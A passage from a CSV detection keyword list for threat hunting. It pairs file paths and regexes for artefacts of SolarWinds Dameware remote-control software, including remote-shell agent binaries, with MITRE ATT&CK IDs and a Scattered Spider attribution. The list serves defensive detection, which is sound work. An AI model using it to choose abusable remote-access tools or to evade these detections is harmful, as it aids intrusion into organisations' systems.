Control","10","10","N/A","N/A","N/A","N/A" "*\Mini Remote Control Service\Settings\SFT: Upload Folder*",".{0,1000}\\Mini\sRemote\sControl\sService\\Settings\\SFT\:\sUpload\sFolder.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*\Mini Remote Control.lnk*",".{0,1000}\\Mini\sRemote\sControl\.lnk.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered 
Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*\MRC_12.0_Bootstrap_Install_Log.txt*",".{0,1000}\\MRC_12\.0_Bootstrap_Install_Log\.txt.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*\MRCCv2.db*",".{0,1000}\\MRCCv2\.db.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*\mspacredentialprovider_*_dameware.dll*",".{0,1000}\\mspacredentialprovider_.{0,1000}_dameware\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\msparegedithelper_*",".{0,1000}\\msparegedithelper_.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\mspxtshlpsrv_*",".{0,1000}\\mspxtshlpsrv_.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" 
"*\mspxwebcom.dll*",".{0,1000}\\mspxwebcom\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\multiplicar negocios\beanywhere support express*",".{0,1000}\\multiplicar\snegocios\\beanywhere\ssupport\sexpress.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\prefetch\baconsoleapp.exe*",".{0,1000}\\prefetch\\baconsoleapp\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\prefetch\baseclient.exe*",".{0,1000}\\prefetch\\baseclient\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\prefetch\basupclphlp.exe*",".{0,1000}\\prefetch\\basupclphlp\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\prefetch\basupregedithlpr.exe*",".{0,1000}\\prefetch\\basupregedithlpr\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - 
TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\prefetch\basupsrvc.exe*",".{0,1000}\\prefetch\\basupsrvc\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\prefetch\basupsrvccnfg.exe*",".{0,1000}\\prefetch\\basupsrvccnfg\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\prefetch\basupsrvcupdater.exe*",".{0,1000}\\prefetch\\basupsrvcupdater\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\prefetch\basupsysinf.exe*",".{0,1000}\\prefetch\\basupsysinf\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\prefetch\basuptshelper.exe*",".{0,1000}\\prefetch\\basuptshelper\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" 
"*\prefetch\damewareagent.exe*",".{0,1000}\\prefetch\\damewareagent\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\prefetch\damewareremoteeverywhereconso*",".{0,1000}\\prefetch\\damewareremoteeverywhereconso.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\prefetch\tcrmtshellagent.exe*",".{0,1000}\\prefetch\\tcrmtshellagent\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\prefetch\tcrmtshellviewer.exe*",".{0,1000}\\prefetch\\tcrmtshellviewer\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\prefetch\tkcuploader.exe*",".{0,1000}\\prefetch\\tkcuploader\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\progra~2\damewa~1\remoteshell\*",".{0,1000}\\progra\~2\\damewa\~1\\remoteshell\\.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - 
T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\quick launch\dameware remote everywhere tech console.lnk*",".{0,1000}\\quick\slaunch\\dameware\sremote\severywhere\stech\sconsole\.lnk.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\Service Install Overwrite Remote CFG*",".{0,1000}\\Service\sInstall\sOverwrite\sRemote\sCFG.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*\SFT: Enable Simple File Transfer*",".{0,1000}\\SFT\:\sEnable\sSimple\sFile\sTransfer.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*\SolarWinds.DepInjectedClassWalker.dll*",".{0,1000}\\SolarWinds\.DepInjectedClassWalker\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*\SolarWinds.Diags.Contract.dll*",".{0,1000}\\SolarWinds\.Diags\.Contract\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 
- T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*\SolarWinds.Diags.DameWare.Extensions.dll*",".{0,1000}\\SolarWinds\.Diags\.DameWare\.Extensions\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*\SolarWinds.Diags.exe*",".{0,1000}\\SolarWinds\.Diags\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*\SolarWinds.Diags.exe.config*",".{0,1000}\\SolarWinds\.Diags\.exe\.config.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*\SolarWinds.Diags.Extensions.Common.dll*",".{0,1000}\\SolarWinds\.Diags\.Extensions\.Common\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*\SolarWinds.Diags.Extensions.dll*",".{0,1000}\\SolarWinds\.Diags\.Extensions\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - 
T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*\SolarWinds.Diags.Platform.Extensions.dll*",".{0,1000}\\SolarWinds\.Diags\.Platform\.Extensions\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*\SolarWinds.Diags.Strings.dll*",".{0,1000}\\SolarWinds\.Diags\.Strings\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*\SOLARWINDS.DRS.LICENSOR.EXE-*",".{0,1000}\\SOLARWINDS\.DRS\.LICENSOR\.EXE\-.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","Dameware Remote Support","10","10","N/A","N/A","N/A","N/A" "*\SolarWinds.LicenseManager.msi*",".{0,1000}\\SolarWinds\.LicenseManager\.msi.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*\SolarWinds.Licensing.Gen4.dll*",".{0,1000}\\SolarWinds\.Licensing\.Gen4\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - 
TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*\SolarWinds.Licensing.Gen4.dll.config*",".{0,1000}\\SolarWinds\.Licensing\.Gen4\.dll\.config.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*\SolarWinds.Licensing.Gen4.Resources.dll*",".{0,1000}\\SolarWinds\.Licensing\.Gen4\.Resources\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*\SolarWinds.Licensing.Gen4.UI.dll*",".{0,1000}\\SolarWinds\.Licensing\.Gen4\.UI\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*\SolarWinds.Licensing.MRC.COMWrapper.dll*",".{0,1000}\\SolarWinds\.Licensing\.MRC\.COMWrapper\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*\SolarWinds.Licensing.MRC.COMWrapper.dll.config*",".{0,1000}\\SolarWinds\.Licensing\.MRC\.COMWrapper\.dll\.config.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini 
Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*\SolarWinds.Licensing.MRC.COMWrapper.tlb*",".{0,1000}\\SolarWinds\.Licensing\.MRC\.COMWrapper\.tlb.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*\SolarWinds.Logging.dll*",".{0,1000}\\SolarWinds\.Logging\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*\SolarWinds.MRC.Licensor.exe*",".{0,1000}\\SolarWinds\.MRC\.Licensor\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*\SolarWinds.MRC.Licensor.exe*",".{0,1000}\\SolarWinds\.MRC\.Licensor\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*\SolarWinds.MRC.Licensor.exe.config*",".{0,1000}\\SolarWinds\.MRC\.Licensor\.exe\.config.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - 
T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*\SolarWinds.MRC.Licensor.log*",".{0,1000}\\SolarWinds\.MRC\.Licensor\.log.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*\SolarWinds.Pluggability.Contract.dll*",".{0,1000}\\SolarWinds\.Pluggability\.Contract\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*\SolarWinds.Pluggability.dll*",".{0,1000}\\SolarWinds\.Pluggability\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*\SolarWinds\Dameware Mini Remote Control*",".{0,1000}\\SolarWinds\\Dameware\sMini\sRemote\sControl.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*\SolarWinds\Logs\Dameware*",".{0,1000}\\SolarWinds\\Logs\\Dameware.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - 
TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*\SOLARWINDS-DAMEWARE-DRS-ST.EX-*",".{0,1000}\\SOLARWINDS\-DAMEWARE\-DRS\-ST\.EX\-.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","Dameware Remote Support","10","10","N/A","N/A","N/A","N/A" "*\SolarWinds-Dameware-DRS-St.exe*",".{0,1000}\\SolarWinds\-Dameware\-DRS\-St\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","Dameware Remote Support","10","10","N/A","N/A","N/A","N/A" "*\start dameware remote everywhere agent.lnk*",".{0,1000}\\start\sdameware\sremote\severywhere\sagent\.lnk.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\start menu\programs\dameware*",".{0,1000}\\start\smenu\\programs\\dameware.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\tcdirectchat.exe*",".{0,1000}\\tcdirectchat\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered 
Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\tcdirectchatde.dll*",".{0,1000}\\tcdirectchatde\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\tcdirectchaten.dll*",".{0,1000}\\tcdirectchaten\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\tcdirectchates.dll*",".{0,1000}\\tcdirectchates\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\tcdirectchatfr.dll*",".{0,1000}\\tcdirectchatfr\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\tcdirectchatit.dll*",".{0,1000}\\tcdirectchatit\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\tcdirectchatpt.dll*",".{0,1000}\\tcdirectchatpt\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - 
T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\tcrmtshellagent.exe*",".{0,1000}\\tcrmtshellagent\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\tcrmtshellagent_*.log*",".{0,1000}\\tcrmtshellagent_.{0,1000}\.log.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\tcrmtshellagentmodule_*",".{0,1000}\\tcrmtshellagentmodule_.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\tcrmtshellviewer.exe*",".{0,1000}\\tcrmtshellviewer\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\tcrmtshellviewer_*.log*",".{0,1000}\\tcrmtshellviewer_.{0,1000}\.log.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" 
"*\tcrmtshellviewermodule_*",".{0,1000}\\tcrmtshellviewermodule_.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\tkcuploader.exe*",".{0,1000}\\tkcuploader\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\wow6432node\multiplicar negocios\bace_dameware*",".{0,1000}\\wow6432node\\multiplicar\snegocios\\bace_dameware.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*dameware remote everywhere*",".{0,1000}\dameware\sremote\severywhere\<\/data\>.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*n-able take control*",".{0,1000}\n\-able\stake\scontrol\<\/data\>.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered 